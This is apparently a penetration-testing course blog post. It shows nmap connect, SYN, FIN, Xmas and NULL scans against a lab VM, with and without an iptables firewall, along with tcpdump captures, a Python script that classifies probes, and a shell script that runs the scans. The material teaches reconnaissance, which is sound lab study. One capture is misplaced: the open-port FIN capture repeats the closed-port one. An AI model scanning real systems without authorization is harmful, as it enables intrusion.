Penetration Testing - 4 (Training Day 73)

SW · March 12, 2023

Lab> Download the Sysinternals Suite

Free Windows tools that security professionals and administrators use as a matter of course
https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

procexp64.exe
Ctrl + Shift + ESC: Task Manager shortcut
Replace Task Manager: Options > Replace Task Manager

procexp64.exe can be used together with VirusTotal.

A site that scans files for malware: antivirus engines from around the world in one place.
https://www.virustotal.com/

tcpview64.exe: netstat or ss for Windows

Lab> TCP Connect Scan (-sT)

When there is no firewall

[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# iptables -F
[root@victim3 ~]# systemctl start httpd
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

Scanning an open port
       S
A -----------> V3
       SA
A <----------- V3
       A
A -----------> V3
       R/A
A -----------> V3

[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:06 EST
Nmap scan report for 200.200.200.6
Host is up (0.00030s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:04:42.002757 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [S], seq 1703896547, win 64240, options [mss 1460,sackOK,TS val 284899562 ecr 0,nop,wscale 7], length 0
18:04:42.002787 IP 200.200.200.6.80 > 200.200.200.3.53946: Flags [S.], seq 4262865332, ack 1703896548, win 28960, options [mss 1460,sackOK,TS val 107808245 ecr 284899562,nop,wscale 7], length 0
18:04:42.003036 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0
18:04:42.003098 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0


Scanning a closed port
       S
A -----------> V3
       R/A
A <----------- V3

[root@kali ~]# nmap -sT -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:12 EST
Nmap scan report for 200.200.200.6
Host is up (0.00029s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:11:12.160565 IP 200.200.200.3.45958 > 200.200.200.6.1: Flags [S], seq 377962957, win 64240, options [mss 1460,sackOK,TS val 285259704 ecr 0,nop,wscale 7], length 0
18:11:12.160590 IP 200.200.200.6.1 > 200.200.200.3.45958: Flags [R.], seq 0, ack 377962958, win 0, length 0

Lab> TCP Stealth Scan (-sS)

When there is no firewall


Scanning an open port
       S
A -----------> V3
       SA
A <----------- V3
       R
A -----------> V3

[root@kali ~]# nmap -sS -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:16 EST
Nmap scan report for 200.200.200.6
Host is up (0.00034s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:15:15.210783 IP 200.200.200.3.48645 > 200.200.200.6.80: Flags [S], seq 2816880098, win 1024, options [mss 1460], length 0
18:15:15.210819 IP 200.200.200.6.80 > 200.200.200.3.48645: Flags [S.], seq 718386699, ack 2816880099, win 29200, options [mss 1460], length 0
18:15:15.211607 IP 200.200.200.3.48645 > 200.200.200.6.80: Flags [R], seq 2816880099, win 0, length 0


Scanning a closed port
       S
A -----------> V3
       R/A
A <----------- V3
[root@kali ~]# nmap -sS -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:19 EST
Nmap scan report for 200.200.200.6
Host is up (0.00022s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:18:05.086850 IP 200.200.200.3.35381 > 200.200.200.6.1: Flags [S], seq 883727068, win 1024, options [mss 1460], length 0
18:18:05.086880 IP 200.200.200.6.1 > 200.200.200.3.35381: Flags [R.], seq 0, ack 883727069, win 0, length 0

Lab> TCP FIN Scan (-sF)

Scanning an open port
       F
A -----------> V3
       F
A -----------> V3

[root@kali ~]# nmap -sF -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:22 EST
Nmap scan report for 200.200.200.6
Host is up (0.00028s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:22:05.668514 IP 200.200.200.3.53541 > 200.200.200.6.80: Flags [F], seq 1234463521, win 1024, length 0
18:22:05.777554 IP 200.200.200.3.53543 > 200.200.200.6.80: Flags [F], seq 1234594595, win 1024, length 0

Scanning a closed port
       F
A -----------> V3
       R/A
A <----------- V3
[root@kali ~]# nmap -sF -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:25 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:24:51.250467 IP 200.200.200.3.62479 > 200.200.200.6.1: Flags [F], seq 1606772599, win 1024, length 0
18:24:51.250498 IP 200.200.200.6.1 > 200.200.200.3.62479: Flags [R.], seq 0, ack 1606772600, win 0, length 0

Lab> TCP X-MAS Scan (-sX)

Scanning an open port
     FPU
A -----------> V3
     FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:28 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:28:38.241427 IP 200.200.200.3.33504 > 200.200.200.6.80: Flags [FPU], seq 1165601945, win 1024, urg 0, length 0
18:28:38.350225 IP 200.200.200.3.33506 > 200.200.200.6.80: Flags [FPU], seq 1165733019, win 1024, urg 0, length 0

Scanning a closed port
      FPU
A -----------> V3
      R/A
A <----------- V3

[root@kali ~]# nmap -sX -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:34 EST
Nmap scan report for 200.200.200.6
Host is up (0.00019s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:34:41.537399 IP 200.200.200.3.34788 > 200.200.200.6.1: Flags [FPU], seq 3973353575, win 1024, urg 0, length 0
18:34:41.537429 IP 200.200.200.6.1 > 200.200.200.3.34788: Flags [R.], seq 0, ack 3973353576, win 0, length 0

Lab> TCP NULL Scan (-sN)

Scanning an open port
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:30 EST
Nmap scan report for 200.200.200.6
Host is up (0.00027s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:34:58.917885 IP 200.200.200.3.36882 > 200.200.200.6.80: Flags [none], win 1024, length 0
19:34:59.026348 IP 200.200.200.3.36884 > 200.200.200.6.80: Flags [none], win 1024, length 0


Scanning a closed port
A -----------> V3
      R/A
A <----------- V3
[root@kali ~]# nmap -sN -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:31 EST
Nmap scan report for 200.200.200.6
Host is up (0.00035s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:37:01.895079 IP 200.200.200.3.34067 > 200.200.200.6.1: Flags [none], win 1024, length 0
19:37:01.895110 IP 200.200.200.6.1 > 200.200.200.3.34067: Flags [R.], seq 0, ack 3100874977, win 0, length 0

Lab> TCP Connect Scan (-sT)

When there is a firewall

[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# systemctl disable firewalld
[root@victim3 ~]# yum -y install iptables-services
[root@victim3 ~]# vi /etc/sysconfig/iptables
# sample configuration for iptables service
# you can edit this manually or use system-config-firewall
# please do not ask us to add additional ports/services to this default configuration
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -j DROP
COMMIT

[root@victim3 ~]# iptables-restore /etc/sysconfig/iptables
[root@victim3 ~]# iptables -nL
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:80
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           
DROP       all  --  0.0.0.0/0            0.0.0.0/0           

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination        

[root@victim3 ~]# systemctl start httpd
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

Scanning an open port
       S
A -----------> V3
       SA
A <----------- V3
       A
A -----------> V3
       R/A
A -----------> V3

[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00025s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:45:46.982247 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [S], seq 3778980217, win 64240, options [mss 1460,sackOK,TS val 290497951 ecr 0,nop,wscale 7], length 0
19:45:46.982286 IP 200.200.200.6.80 > 200.200.200.3.49118: Flags [S.], seq 1467186253, ack 3778980218, win 28960, options [mss 1460,sackOK,TS val 113873225 ecr 290497951,nop,wscale 7], length 0
19:45:46.982485 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 290497952 ecr 113873225], length 0
19:45:46.982531 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 290497952 ecr 113873225], length 0


Scanning a closed port
       S
A -----------> V3
       S
A -----------> V3  

[root@kali ~]# nmap -sT -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:41 EST
Nmap scan report for 200.200.200.6
Host is up (0.00071s latency).

PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

Because the firewall DROPs the packets sent to closed port 1, no RST packet comes back.
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:47:21.221882 IP 200.200.200.3.45334 > 200.200.200.6.1: Flags [S], seq 2893359925, win 64240, options [mss 1460,sackOK,TS val 290584941 ecr 0,nop,wscale 7], length 0
19:47:21.328656 IP 200.200.200.3.45340 > 200.200.200.6.1: Flags [S], seq 2798182175, win 64240, options [mss 1460,sackOK,TS val 290585039 ecr 0,nop,wscale 7], length 0

Lab> TCP Stealth Scan (-sS)

When there is a firewall


Scanning an open port
       S
A -----------> V3
       SA
A <----------- V3
       R
A -----------> V3

[root@kali ~]# nmap -sS -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:45 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:51:21.853228 IP 200.200.200.3.51545 > 200.200.200.6.80: Flags [S], seq 3422609856, win 1024, options [mss 1460], length 0
19:51:21.853279 IP 200.200.200.6.80 > 200.200.200.3.51545: Flags [S.], seq 2702628379, ack 3422609857, win 29200, options [mss 1460], length 0
19:51:21.853536 IP 200.200.200.3.51545 > 200.200.200.6.80: Flags [R], seq 3422609857, win 0, length 0


Scanning a closed port
       S
A -----------> V3
       S
A -----------> V3  
[root@kali ~]# nmap -sS -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:46 EST
Nmap scan report for 200.200.200.6
Host is up (0.00021s latency).

PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:52:20.778022 IP 200.200.200.3.44083 > 200.200.200.6.1: Flags [S], seq 2147615859, win 1024, options [mss 1460], length 0
19:52:20.886994 IP 200.200.200.3.44085 > 200.200.200.6.1: Flags [S], seq 2147484785, win 1024, options [mss 1460], length 0

Lab> TCP FIN Scan (-sF)

Scanning an open port
       F
A -----------> V3
       F
A -----------> V3
[root@kali ~]# nmap -sF -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:47 EST
Nmap scan report for 200.200.200.6
Host is up (0.00089s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:54:30.224476 IP 200.200.200.3.54405 > 200.200.200.6.1: Flags [F], seq 3549946888, win 1024, length 0
19:54:30.333396 IP 200.200.200.3.54407 > 200.200.200.6.1: Flags [F], seq 3549815818, win 1024, length 0

Scanning a closed port
       F
A -----------> V3
       F
A -----------> V3  
[root@kali ~]# nmap -sF -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:48 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:54:30.224476 IP 200.200.200.3.54405 > 200.200.200.6.1: Flags [F], seq 3549946888, win 1024, length 0
19:54:30.333396 IP 200.200.200.3.54407 > 200.200.200.6.1: Flags [F], seq 3549815818, win 1024, length 0

Lab> TCP X-MAS Scan (-sX)

Scanning an open port
     FPU
A -----------> V3
     FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:00 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:08:10.129604 IP 200.200.200.3.62383 > 200.200.200.6.80: Flags [FPU], seq 1138112877, win 1024, urg 0, length 0
20:08:10.239291 IP 200.200.200.3.62385 > 200.200.200.6.80: Flags [FPU], seq 1137981807, win 1024, urg 0, length 0

Scanning a closed port
      FPU
A -----------> V3
      FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:01 EST
Nmap scan report for 200.200.200.6
Host is up (0.00022s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:09:08.738280 IP 200.200.200.3.36118 > 200.200.200.6.1: Flags [FPU], seq 3678728697, win 1024, urg 0, length 0
20:09:08.847619 IP 200.200.200.3.36120 > 200.200.200.6.1: Flags [FPU], seq 3678859771, win 1024, urg 0, length 0

Lab> TCP NULL Scan (-sN)

Scanning an open port
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:02 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:10:08.821176 IP 200.200.200.3.48976 > 200.200.200.6.80: Flags [none], win 1024, length 0
20:10:08.930698 IP 200.200.200.3.48978 > 200.200.200.6.80: Flags [none], win 1024, length 0


Scanning a closed port
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:03 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:10:50.399720 IP 200.200.200.3.48730 > 200.200.200.6.1: Flags [none], win 1024, length 0
20:10:50.509321 IP 200.200.200.3.48732 > 200.200.200.6.1: Flags [none], win 1024, length 0
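The probe/response pairs in the captures above (both the no-firewall and the firewall series) can be classified mechanically from the tcpdump lines alone. The following script is an added example and not part of the lab notes: it parses `tcpdump -nn` lines like those shown, names the scan type from the probe packet and derives the port state from the target's reply or silence. SAMPLE_LINES are copies of lines from the captures above.

```python
"""Classify port-scan probes in tcpdump output.

Added example, not part of the lab notes. Parses `tcpdump -nn` lines like the
captures above, names the scan type from the probe packet and derives the port
state from the target's reply or silence. SAMPLE_LINES are copied from the
captures above (no-firewall and firewall runs against victim3).
"""
import re
from collections import OrderedDict

# One tcpdump -nn line:
#   18:04:42.002757 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [S], seq ..., win 64240, options [...], length 0
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\](?P<rest>.*)$"
)
OPTS_RE = re.compile(r"options \[([^\]]*)\]")
# Flags of the first packet of each probe, as tcpdump prints them.
PROBE_FLAGS = {"S": "SYN", "F": "FIN (-sF)", "FPU": "Xmas (-sX)", "none": "NULL (-sN)"}


def parse_line(line):
    """Parse one tcpdump line into a dict; return None for banner or noise lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    pkt = m.groupdict()
    pkt["sport"], pkt["dport"] = int(pkt["sport"]), int(pkt["dport"])
    om = OPTS_RE.search(pkt.pop("rest"))
    pkt["opts"] = om.group(1) if om else ""
    return pkt


def probe_type(flags, opts):
    """Name the scan type from the probe packet alone."""
    if flags != "S":
        return PROBE_FLAGS.get(flags)
    # In the captures above the SYN the kernel builds for a connect() scan
    # carries sackOK/TS/wscale and win 64240, while nmap's hand-crafted -sS SYN
    # carries only mss and win 1024: the options tell -sT and -sS apart here.
    return "connect (-sT)" if "wscale" in opts else "SYN/stealth (-sS)"


def port_state(first_flags, replies):
    """Map the target's reply (or silence) to the state nmap reports."""
    if "S." in replies:
        return "open"
    if "R." in replies:
        return "closed"
    # Silence: an unanswered SYN means 'filtered'; FIN/Xmas/NULL probes cannot
    # tell an open port from a firewall that drops, hence 'open|filtered'.
    return "filtered" if first_flags == "S" else "open|filtered"


def classify_capture(lines, target_ip):
    """Return {(scanner_ip, target_port, scan_type, state): number_of_probes}."""
    flows = OrderedDict()  # (scanner ip, scanner port, target port) -> packets
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        if pkt["dst"] == target_ip:
            flows.setdefault((pkt["src"], pkt["sport"], pkt["dport"]), []).append(("in", pkt))
        elif pkt["src"] == target_ip:
            flows.setdefault((pkt["dst"], pkt["dport"], pkt["sport"]), []).append(("out", pkt))
    findings = OrderedDict()
    for (scanner, _sport, dport), pkts in flows.items():
        inbound = [p for direction, p in pkts if direction == "in"]
        if not inbound:
            continue
        scan = probe_type(inbound[0]["flags"], inbound[0]["opts"])
        if scan is None:
            continue  # not one of the probe shapes shown above
        replies = [p["flags"] for direction, p in pkts if direction == "out"]
        key = (scanner, dport, scan, port_state(inbound[0]["flags"], replies))
        findings[key] = findings.get(key, 0) + 1  # a retransmitted probe uses a new source port
    return findings


SAMPLE_LINES = """\
18:04:42.002757 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [S], seq 1703896547, win 64240, options [mss 1460,sackOK,TS val 284899562 ecr 0,nop,wscale 7], length 0
18:04:42.002787 IP 200.200.200.6.80 > 200.200.200.3.53946: Flags [S.], seq 4262865332, ack 1703896548, win 28960, options [mss 1460,sackOK,TS val 107808245 ecr 284899562,nop,wscale 7], length 0
18:04:42.003036 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0
18:04:42.003098 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0
18:18:05.086850 IP 200.200.200.3.35381 > 200.200.200.6.1: Flags [S], seq 883727068, win 1024, options [mss 1460], length 0
18:18:05.086880 IP 200.200.200.6.1 > 200.200.200.3.35381: Flags [R.], seq 0, ack 883727069, win 0, length 0
18:22:05.668514 IP 200.200.200.3.53541 > 200.200.200.6.80: Flags [F], seq 1234463521, win 1024, length 0
18:22:05.777554 IP 200.200.200.3.53543 > 200.200.200.6.80: Flags [F], seq 1234594595, win 1024, length 0
18:34:41.537399 IP 200.200.200.3.34788 > 200.200.200.6.1: Flags [FPU], seq 3973353575, win 1024, urg 0, length 0
18:34:41.537429 IP 200.200.200.6.1 > 200.200.200.3.34788: Flags [R.], seq 0, ack 3973353576, win 0, length 0
19:34:58.917885 IP 200.200.200.3.36882 > 200.200.200.6.80: Flags [none], win 1024, length 0
19:34:59.026348 IP 200.200.200.3.36884 > 200.200.200.6.80: Flags [none], win 1024, length 0
19:47:21.221882 IP 200.200.200.3.45334 > 200.200.200.6.1: Flags [S], seq 2893359925, win 64240, options [mss 1460,sackOK,TS val 290584941 ecr 0,nop,wscale 7], length 0
19:47:21.328656 IP 200.200.200.3.45340 > 200.200.200.6.1: Flags [S], seq 2798182175, win 64240, options [mss 1460,sackOK,TS val 290585039 ecr 0,nop,wscale 7], length 0
""".splitlines()

if __name__ == "__main__":
    for (scanner, dport, scan, state), n in classify_capture(SAMPLE_LINES, "200.200.200.6").items():
        print(f"{scanner} -> port {dport}: {scan}, {state} ({n} probe(s))")
```

Feed it `tcpdump -nn` output saved with `-l` to a file and it reports one line per (scanner, port, scan type, state), counting retransmitted probes as the same finding.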

Lab> Port scanning with a shell script

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes

[root@kali ~]# vi nmap.sh 
#!/bin/sh

victimIP="200.200.200.6"
port=80

nmap -sT -p $port $victimIP
nmap -sS -p $port $victimIP
nmap -sF -p $port $victimIP
nmap -sX -p $port $victimIP

[root@kali ~]# chmod 755 nmap.sh
[root@kali ~]# ./nmap.sh 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00021s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00094s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00047s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds


Order of the scans in the capture below: -sT -p 80 > -sS -p 80 > -sF -p 80 > -sX -p 80
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:40:31.618114 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [S], seq 1847757251, win 64240, options [mss 1460,sackOK,TS val 286883803 ecr 0,nop,wscale 7], length 0
18:40:31.618150 IP 200.200.200.6.80 > 200.200.200.3.46754: Flags [S.], seq 2272028085, ack 1847757252, win 28960, options [mss 1460,sackOK,TS val 109957860 ecr 286883803,nop,wscale 7], length 0
18:40:31.618350 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 286883804 ecr 109957860], length 0
18:40:31.618357 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 286883804 ecr 109957860], length 0
